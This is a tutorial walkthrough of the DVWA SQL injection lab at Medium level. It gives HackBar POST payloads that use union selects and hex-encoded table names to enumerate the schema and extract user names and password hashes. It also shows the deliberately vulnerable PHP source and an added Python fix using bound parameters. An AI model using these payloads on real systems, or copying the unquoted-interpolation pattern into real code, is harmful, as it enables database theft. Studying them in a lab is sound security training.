DVWA -- SQL Injection -- Low
Level: Medium
The Medium-level code uses the mysql_real_escape_string function to escape the special characters \x00, \n, \r, \, ', ", and \x1a, and the front-end page uses a drop-down select form in an attempt to control user input. Although the front end only offers a drop-down menu, the request can still be intercepted and its parameters modified, so a maliciously constructed query parameter can be submitted. This is why the intercepting proxy Burp Suite and the browser's proxy settings come into play.
1. View the POST request
2. Submit the POST request with HackBar
Switch to HackBar --> Load URL --> Post Data, and enter id=3&Submit=Submit
3. Enter ' ; an error is returned, so this is numeric-type injection
4. Guess the number of columns in the SQL query
From the results below, the SQL query returns 2 columns
id=1 order by 2 &Submit=Submit #query succeeds
id=1 order by 4 &Submit=Submit #query fails
id=1 order by 3 &Submit=Submit #query fails
5. Determine which positions are displayed
id=1 union select 1,2 &Submit=Submit
6. Get the current database name and version
id=1 and 1=2 union select database(),version() &Submit=Submit
7. Get the table names in the database (group_concat())
id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit
8. Get the table's columns
Because single quotes are escaped, the escaping has to be bypassed; a hexadecimal literal can be used instead of a quoted string.
String-to-hexadecimal conversion: https://zixuephp.net/tool-str-hex.html
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit
The single quote is escaped, so an error is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit
9. Get the user information
id=1 and 1=2 union select user,password from users # &Submit=Submit
10. Decode the password hashes
Back-end source code
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    // Note: $id is interpolated unquoted, so the escaping above does not protect this query
    $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>
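Why the Medium-level escaping does not help, and what the fix looks like, as an added Python example that is not part of the original post or of DVWA: it imitates the character set that mysqli_real_escape_string escapes, runs the page's quote-free union payload against a constructed SQLite users table (a stand-in, not DVWA's real schema), and contrasts the unquoted interpolation with an integer check plus a bound parameter.

```python
import re
import sqlite3

# Constructed sample rows standing in for DVWA's users table (assumption, not the real data).
SAMPLE_USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    """Build an in-memory SQLite database with the constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return db


def mysql_style_escape(value):
    """Imitate mysqli_real_escape_string: backslash-escape NUL, \\n, \\r, \\, ', \" and Ctrl-Z.
    Digits, spaces and SQL keywords are left untouched, so the escaping only
    has an effect inside a quoted string literal."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def medium_lookup(db, user_input):
    """DVWA Medium behaviour: escape the input, then interpolate it UNQUOTED
    into a numeric comparison. Quote-free input reaches the parser unchanged."""
    query = ("SELECT first_name, last_name FROM users WHERE user_id = "
             + mysql_style_escape(user_input))
    return db.execute(query).fetchall()


def hardened_lookup(db, user_input):
    """Defender's fix: reject anything that is not an integer, then bind the
    value as a query parameter so it can never become SQL syntax."""
    if not re.fullmatch(r"[0-9]+", user_input):
        raise ValueError("user_id must be a non-negative integer")
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (int(user_input),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(medium_lookup(db, "1 and 1=2 union select 1,2"))   # escaping did nothing
    print(hardened_lookup(db, "1"))                          # normal lookup
```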